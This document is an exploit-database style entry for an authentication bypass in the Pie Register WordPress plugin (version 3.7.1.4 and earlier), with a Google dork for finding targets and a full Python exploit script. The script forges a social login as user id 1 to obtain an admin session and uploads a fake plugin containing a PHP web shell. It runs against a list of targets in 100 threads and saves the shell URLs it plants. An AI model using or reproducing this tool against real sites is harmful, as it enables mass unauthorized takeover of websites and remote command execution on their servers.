# Exploit Title: Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE
# Google Dork: inurl:/wp-content/plugins/pie-register/
# Date: 2025-07-09
# Exploit Author: Md Amanat Ullah (xSwads)
# Vendor Homepage: https://wordpress.org/plugins/pie-register/
# Software Link:
https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
# Version: <= 3.7.1.4
# Tested on: Ubuntu 22.04
# CVE: CVE-2025-34077

#!/usr/bin/env python3
import requests
import zipfile
import io
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from colorama import Fore, Style, init
from threading import Lock
init(autoreset=True)

SHELL_PHP = "<?php if(isset($_GET['cmd'])) echo shell_exec($_GET['cmd']); ?>"
PLUGIN_DIR = "evilplugin"
ZIP_NAME = "evilplugin.zip"
SHELL_FILE = "shell.php"
OUTPUT_FILE = "Shells.txt"
HEADERS = {'User-Agent': 'Mozilla/5.0'}
TIMEOUT = 10
lock = Lock()

def FilterURLS(site):
    site = site.strip()
    if not site.startswith(('http://', 'https://')):
        site = 'http://' + site
    if not site.endswith('/'):
        site += '/'
    return site

def make_shell_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as z:
        z.writestr(f"{PLUGIN_DIR}/{PLUGIN_DIR}.php", "<?php /* Plugin */ ?>")
        z.writestr(f"{PLUGIN_DIR}/{SHELL_FILE}", SHELL_PHP)
    buf.seek(0)
    return buf

def exploit(target):
    target = FilterURLS(target)
    session = requests.Session()
    data = {"social_site": "true", "user_id_social_site": "1"}
    try:
        r = session.post(f"{target}?pr_social_login=1", data=data, headers=HEADERS, timeout=TIMEOUT)
    except:
        print(f"{Fore.RED}[Failed] - {target}")
        return

    if not session.cookies:
        print(f"{Fore.RED}[Failed] - {target}")
        return
    files = {"pluginzip": (ZIP_NAME, make_shell_zip(), "application/zip")}
    try:
        upload = session.post(f"{target}wp-admin/plugin-install.php?upload", files=files, headers=HEADERS, timeout=TIMEOUT)
    except:
        print(f"{Fore.RED}[Failed] - {target}")
        return

    if "Plugin installed successfully" in upload.text:
        shell_url = f"{target}wp-content/plugins/{PLUGIN_DIR}/{SHELL_FILE}"
        print(f"{Fore.GREEN}[Exploited] - {shell_url}")
        with lock:
            with open(OUTPUT_FILE, "a") as f:
                f.write(shell_url + "\n")
    else:
        print(f"{Fore.RED}[Failed] - {target}")

def main(targets_file):
    with open(targets_file, "r") as f:
        targets = [line.strip() for line in f if line.strip()]

    with ThreadPoolExecutor(max_workers=100) as executor:
        futures = [executor.submit(exploit, target) for target in targets]
        for _ in as_completed(futures):
            pass

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} list.txt")
        sys.exit(1)

    main(sys.argv[1])